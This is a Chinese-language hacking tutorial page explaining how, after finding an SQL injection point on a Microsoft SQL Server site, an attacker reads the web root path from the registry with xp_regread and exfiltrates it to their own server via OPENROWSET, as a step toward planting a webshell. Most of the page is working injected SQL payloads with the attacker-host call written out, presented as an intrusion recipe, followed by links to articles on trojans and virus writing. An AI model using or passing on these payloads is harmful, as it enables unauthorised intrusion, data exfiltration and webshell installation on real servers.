渗透中用openrowset搞shell的方法

所属分类: 网络编程 / 黑客相关 阅读数: 715
收藏 0 赞 0 分享
渗透中用openrowset搞shell的方法 
得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库 

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

这样fenggou这个表里就会有这样一条记录select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于执行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时你在你机器上SQL事件追踪器上就会显示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~ 

更多精彩内容其他人还在看

网页打开后自动执行木马

网页打开后自动执行木马
收藏 0 赞 0 分享

浅析2004年出现的4种新后门技术

这篇文章主要介绍了浅析2004年出现的4种新后门技术,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
收藏 0 赞 0 分享

黑客攻击方式的四种最新趋势

黑客攻击方式的四种最新趋势
收藏 0 赞 0 分享

密码知识教程二

这篇文章主要介绍了密码知识教程二,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
收藏 0 赞 0 分享

密码知识教程一

密码知识教程一
收藏 0 赞 0 分享

Win32下病毒设计入门

Win32下病毒设计入门
收藏 0 赞 0 分享

恶意代码与网络安全

恶意代码与网络安全
收藏 0 赞 0 分享

几款黑客工具的使用方法

几款黑客工具的使用方法
收藏 0 赞 0 分享

当菜鸟遇上黒客之三:QQ防盗篇

当菜鸟遇上黒客之三:QQ防盗篇
收藏 0 赞 0 分享

NT完全入侵教程(新手篇)

NT完全入侵教程(新手篇)
收藏 0 赞 0 分享
查看更多